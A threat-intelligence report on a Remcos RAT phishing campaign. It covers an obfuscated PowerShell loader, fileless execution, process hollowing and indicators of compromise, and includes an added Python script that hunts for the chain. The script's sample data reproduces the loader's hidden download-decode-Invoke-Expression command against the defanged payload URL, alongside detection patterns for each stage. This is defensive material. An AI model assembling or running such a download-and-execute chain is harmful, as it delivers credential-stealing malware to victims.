CyberProof researchers have observed a recent surge in Remcos Remote Access Trojan (RAT) infections in September and October 2025.
The malware campaign, distributed primarily through email attachments and social engineering lures, accounted for roughly 11% of all infostealer incidents during the quarter.
Although marketed as a legitimate remote administration tool, Remcos continues to be abused by threat actors for full-scale credential theft and persistence operations.
Malspam Drops Obfuscated PowerShell Loader
In the most recent attack analyzed by CyberProof’s Threat Research team, victims received phishing emails containing an archive named ‘EFEMMAK TURKEY INQUIRY ORDER NR 09162025.gz’. When extracted, it dropped a batch file that executed an obfuscated PowerShell script.
The script demonstrated heavy code obfuscation using custom functions such as Lotusblo and Garrots to evade static detection and signature-based scanners.
Upon execution, the PowerShell loader created a hidden process and issued TLS 1.2 web requests to hxxps://icebergtbilisi.ge/Sluknin.afm, repeatedly attempting to download an encoded payload.
After retrieving and Base64-decoding the data, the loader decompressed it using GZip and executed it directly in memory via Invoke-Expression, confirming the use of a fileless execution chain. The downloaded payload was identified as the Remcos RAT.
The PowerShell code then launched msiexec.exe, which executed additional commands and performed process hollowing to inject its malicious payload into RmClient.exe, a legitimate Microsoft-distributed binary.
Telemetry logs showed subsequent attempts to access browser credential storage, triggering partial EDR alerts that revealed the credential-theft functionality.
The RmClient binary involved in this injection was cryptographically validated as genuine, highlighting the attackers' deliberate use of trusted, signed binaries to bypass endpoint defenses.
Credential Theft and Network Indicators
Analysis of system timelines and network telemetry linked the msiexec process to external command-and-control connections, including the domains ablelifepurelife[.]ydns.eu, ablelifepurelifebk[.]ydns.eu, and icebergtbilisi[.]ge.
The attack temporarily stored payloads in the AppData\Roaming\Hereni directory. The Gen directory contains several random temporary files dropped in user profile paths.
CyberProof’s custom hunting query for rmclient.exe processes spawned from temporary directories successfully correlated multiple intrusion events.
Hash analysis confirmed the involvement of PowerShell loaders and scripts with SHA256 values 5cb34177d0289e9737e5a261b8d1aac227656b96c768f789d6fcc9bc20adb05e and 3ec5b13ee66d84dd75ac619ebb79c64cef7986dd6e8049f689f9ac39c272fea2.
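As an added illustration of the detection side of this chain (editorial example code, not CyberProof's hunting query and not part of the report), the following Python script runs three checks over a handful of constructed Sysmon-style process-creation (Event ID 1) and DNS-query (Event ID 22) records: a PowerShell command line carrying the download, Base64-decode, GZip-inflate and Invoke-Expression stages described above; rmclient.exe executing from, or spawned in, a temporary or user-profile directory, which is the condition the report's hunt keyed on; and DNS lookups of the listed command-and-control domains. The field names, user name, benign install path and benign records are assumptions constructed for the example; the domains, payload URL and directory names come from the report.

```python
"""Hunt over constructed Sysmon-style events for the Remcos infection chain.

Editorial example: field names follow Sysmon Event ID 1 (process create) and
Event ID 22 (DNS query); every record below is constructed, not real telemetry.
"""
import re
from typing import Dict, List, Tuple

Event = Dict[str, object]

# Domains published as indicators, kept defanged exactly as the report lists them.
DEFANGED_DOMAINS = [
    "ablelifepurelife[.]ydns.eu",
    "ablelifepurelifebk[.]ydns.eu",
    "icebergtbilisi[.]ge",
]


def refang(indicator: str) -> str:
    """Undo common defanging ('[.]', 'hxxp') so an indicator can be compared to telemetry."""
    return indicator.replace("[.]", ".").replace("hxxp", "http").lower()


IOC_DOMAINS = {refang(d) for d in DEFANGED_DOMAINS}

# One pattern per stage of the fileless chain: hidden window, TLS 1.2 set-up,
# download, Base64 decode, GZip inflate, in-memory execution.
LOADER_STAGES = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "tls12": re.compile(r"SecurityProtocol.*Tls12", re.I),
    "download": re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|\biwr\b", re.I),
    "base64": re.compile(r"FromBase64String", re.I),
    "gzip": re.compile(r"GZipStream|Decompress", re.I),
    "in_memory_exec": re.compile(r"Invoke-Expression|\biex\b", re.I),
}

# Temporary and user-profile locations a Microsoft-signed binary should not run from.
TEMP_PATH = re.compile(r"\\(AppData\\(Local|Roaming)|Temp|Users\\[^\\]+\\Downloads)\\", re.I)


def loader_stages(command_line: str) -> List[str]:
    """Return the names of the loader stages visible in a PowerShell command line."""
    return [name for name, rx in LOADER_STAGES.items() if rx.search(command_line)]


def is_fileless_loader(event: Event, min_stages: int = 3) -> bool:
    """PowerShell that executes in memory and shows at least two further loader stages."""
    image = str(event.get("Image", "")).lower()
    if not image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        return False
    stages = loader_stages(str(event.get("CommandLine", "")))
    return "in_memory_exec" in stages and len(stages) >= min_stages


def is_rmclient_from_temp(event: Event) -> bool:
    """The report's hunt: rmclient.exe running from, or spawned in, a temporary directory."""
    image = str(event.get("Image", "")).lower()
    if not image.endswith("\\rmclient.exe"):
        return False
    fields = ("Image", "ParentImage", "CurrentDirectory")
    return any(TEMP_PATH.search(str(event.get(f, ""))) for f in fields)


def matches_c2_domain(event: Event) -> bool:
    """DNS query for one of the listed C2 domains or any subdomain of it."""
    name = str(event.get("QueryName", "")).lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in IOC_DOMAINS)


def hunt(events: List[Event]) -> List[Tuple[int, str]]:
    """Run all three checks and return (RecordId, label) for every hit."""
    findings: List[Tuple[int, str]] = []
    for ev in events:
        rid = int(ev["RecordId"])  # type: ignore[arg-type]
        if ev.get("EventID") == 1:
            if is_fileless_loader(ev):
                findings.append((rid, "fileless-powershell-loader"))
            if is_rmclient_from_temp(ev):
                findings.append((rid, "rmclient-from-temp-dir"))
        elif ev.get("EventID") == 22 and matches_c2_domain(ev):
            findings.append((rid, "c2-domain-query"))
    return findings


# Constructed records. Record 1 carries the loader stages the report describes (payload URL
# kept defanged, elided with '...'); 2 and 4 mirror the hollowed RmClient and its C2 lookup;
# 3, 5 and 6 are benign look-alikes, with an assumed install path for the legitimate binary.
SAMPLE_EVENTS: List[Event] = [
    {"RecordId": 1, "EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CurrentDirectory": r"C:\Users\alice\AppData\Local\Temp",
     "CommandLine": ("powershell.exe -WindowStyle Hidden -Command "
                     "[Net.ServicePointManager]::SecurityProtocol='Tls12'; "
                     "$raw=(New-Object Net.WebClient).DownloadString('hxxps://icebergtbilisi.ge/Sluknin.afm'); "
                     "$bytes=[Convert]::FromBase64String($raw); ... IO.Compression.GZipStream ... | Invoke-Expression")},
    {"RecordId": 2, "EventID": 1,
     "Image": r"C:\Users\alice\AppData\Local\Temp\RmClient.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CurrentDirectory": r"C:\Users\alice\AppData\Roaming\Hereni",
     "CommandLine": "RmClient.exe"},
    {"RecordId": 3, "EventID": 1,
     "Image": r"C:\Program Files\Contoso Remote\RmClient.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CurrentDirectory": r"C:\Program Files\Contoso Remote",
     "CommandLine": "RmClient.exe"},
    {"RecordId": 4, "EventID": 22,
     "Image": r"C:\Windows\System32\msiexec.exe",
     "QueryName": "ablelifepurelife.ydns.eu"},
    {"RecordId": 5, "EventID": 22,
     "Image": r"C:\Windows\System32\svchost.exe",
     "QueryName": "ctldl.windowsupdate.com"},
    {"RecordId": 6, "EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CurrentDirectory": r"C:\src\build",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Content build.ps1 | Invoke-Expression"},
]

if __name__ == "__main__":
    for rid, label in hunt(SAMPLE_EVENTS):
        print(f"record {rid}: {label}")
```

The loader check deliberately does not fire on Invoke-Expression alone (record 6), since piping a local script into it is routine in administration; requiring in-memory execution plus at least two further stages keeps the rule anchored to the decode-inflate-execute shape without pinning it to any one download cmdlet. The rmclient rule looks at the image path, the parent image and the working directory together, because the hollowed instance may inherit a clean-looking image path while its working directory still points into the AppData drop location the report describes.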
Email attachments, disguised as corporate order inquiries, carried distinctive filenames across regions, including German, Polish, and Portuguese variants.
CyberProof emphasizes that this campaign’s sophistication lies in its stealthy, fileless infection method and credential-theft motivation.
As attackers continue refining obfuscation and process injection methods, organizations are urged to strengthen their detection layers and maintain vigilance toward targeted phishing lures.
Indicators of Compromise
- Ablelifepurelife[.]ydns.eu
- ablelifepurelifebk[.]ydns.eu
- icebergtbilisi[.]ge
- Email attachment name: EFEMMAK TURKEY INQUIRY ORDER NR 09162025.gz
- Attachment hash: 5eb460204cd0f5510b146b8465b4392e9d0795b5d7fdb51b1c1429f97593a4b3
- Batch script file: EFEMMAK TURKEY INQUIRY ORDER NR 09162025.bat
- Script hash: 5cb34177d0289e9737e5a261b8d1aac227656b96c768f789d6fcc9bc20adb05e